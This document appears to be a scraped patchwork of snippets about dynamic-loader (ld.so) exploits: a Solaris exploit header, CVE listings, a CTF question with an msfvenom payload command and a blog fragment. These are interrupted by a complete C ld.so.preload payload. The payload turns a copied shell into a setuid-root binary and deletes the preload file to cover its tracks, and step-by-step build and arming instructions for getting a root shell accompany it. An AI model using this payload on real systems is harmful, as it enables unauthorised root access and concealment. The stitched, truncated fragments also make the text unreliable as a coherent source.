/*
 * ##### ld.so.1 exploit (SPARC) #####
 * [coded by: osker178 (bjr213 psu.edu)]
 *
 * Alright, so this exploits a fairly standard buffer overflow in the
 * default Solaris runtime linker (ld.so.1) (discovery by Jouko Pynnonen).
 * The only real deviation here from the standard overflow-and-return-into-libc
 * scenario is that at the time the overflow occurs, the libc object file
 * has not …
12/15/2006 · The exploit works as follows:
# 1. Create a shared library including a bindshell
# 2. Create a ld.so.preload file referencing the previously created shared library
# 3. Connect to the remote ftp server and log in using the ftp account
# 4. Upload the shared library and ld.so.preload into /etc
# 5.
Solaris 9/10 - 'ld.so' Local Privilege Escalation (2). CVE-2005-2072 (secondary ID 17614). Local exploit for the Solaris platform.

GNU C Library Dynamic Loader (glibc ld.so) - Memory Leak / Buffer Overflow. CVE-2017-1000409, CVE-2017-1000408. Local exploit for the Linux platform.
I'm playing some CTF challenges and I'm trying to exploit ld.so.preload to obtain a root shell. I'm currently testing on my local Kali. I generate my payload as follows:

msfvenom -p linux/x64/exec CMD=/bin/bash -f elf-so -o /root/bash.so

When executing chpass or passwd (which are setuid root), _dl_setup_env in OpenBSD's ld.so tries to strip LD_LIBRARY_PATH from the environment, but fails when it cannot allocate memory. Thus the attacker is able to execute their own library code as root (CVE-2019-19726).

CVE-2019-19520 · openbsd-authroot: OpenBSD local root exploit.
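The ld.so.preload technique behind both the 2006 ftp-upload exploit and the CTF question above, as an added example written for this page (it is not osker178's code, the 2006 exploit, or the poster's msfvenom payload). The msfvenom elf-so payload is the pre-packaged version of the same idea; writing it by hand shows the two details that matter in practice: the constructor runs in every dynamically linked process on the box, so it must check geteuid() before acting, and it must not spawn a child, because that child would load the preload library again. Assumptions not stated on the page: Linux/glibc, the attacker can write /etc/ld.so.preload, and a plain copy of /bin/sh has been placed at /tmp/rootsh beforehand (the path and the PRELOAD_PAYLOAD build flag are this example's own choices).

```c
/*
 * Added example: a minimal /etc/ld.so.preload payload for Linux/glibc.
 * Not code from the exploits or the question quoted above.
 *
 * Assumptions (this example's own, not from the page):
 *   - /etc/ld.so.preload is writable by the attacker (as in the ftp-upload
 *     scenario above) and this library is dropped somewhere world-readable;
 *   - a copy of /bin/sh already sits at TARGET_SHELL (cp /bin/sh /tmp/rootsh),
 *     so the payload only has to chown/chmod it with raw syscalls. Spawning
 *     a helper process here would itself load the preload library again.
 *
 * Build as a payload:   gcc -shared -fPIC -DPRELOAD_PAYLOAD -o /tmp/evil.so preload_payload.c
 * Without -DPRELOAD_PAYLOAD only the pure helpers are compiled, so the file
 * links into an ordinary test program without any constructor running.
 */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define TARGET_SHELL "/tmp/rootsh"      /* assumption: attacker-placed copy of /bin/sh */
#define PRELOAD_FILE "/etc/ld.so.preload"

/* The constructor fires in every dynamically linked process, privileged or
 * not; act only when the effective UID is 0 (setuid-root binary or root daemon). */
int preload_should_act(uid_t euid)
{
    return euid == 0;
}

/* Make the prepared shell root-owned and setuid (mode 4755) using syscalls
 * only. Returns 0 on success, -1 if the target is missing, not a regular
 * file, or the caller lacks the privilege to chown it. */
int install_setuid_shell(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return -1;
    if (chown(path, 0, 0) != 0)
        return -1;
    if (chmod(path, S_ISUID | S_IRWXU | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH) != 0)
        return -1;
    return 0;
}

/* Format the line /etc/ld.so.preload expects: one absolute library path per
 * line (glibc also accepts several paths separated by whitespace).
 * Returns the number of bytes written, or -1 if the path is not absolute or
 * the buffer is too small. */
int format_preload_line(const char *libpath, char *out, size_t outlen)
{
    if (libpath == NULL || libpath[0] != '/')
        return -1;
    int n = snprintf(out, outlen, "%s\n", libpath);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

#ifdef PRELOAD_PAYLOAD
/* Runs before main() of whatever binary the loader is starting. */
__attribute__((constructor))
static void preload_init(void)
{
    if (!preload_should_act(geteuid()))
        return;
    if (install_setuid_shell(TARGET_SHELL) == 0)
        unlink(PRELOAD_FILE);   /* stop re-triggering and shrink the footprint */
}
#endif
```

To arm it, write the output of format_preload_line() for the library's absolute path into /etc/ld.so.preload and wait for, or invoke, any setuid-root program; the first root-privileged process that starts performs the chown/chmod and removes the preload file, after which /tmp/rootsh -p gives a root shell. The same constructor with a bind shell in place of install_setuid_shell() is what step 1 of the 2006 exploit above describes.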
11/21/2018 · Certain security measures have been put in place to prevent this kind of exploit, but there was a time when it was possible, and I think it is an interesting mechanism to understand.

3. Setuid bit on ldconfig

ldconfig is used to create, update and remove the symbolic links for the currently installed shared libraries, based on the library directories listed in /etc/ld.so.conf.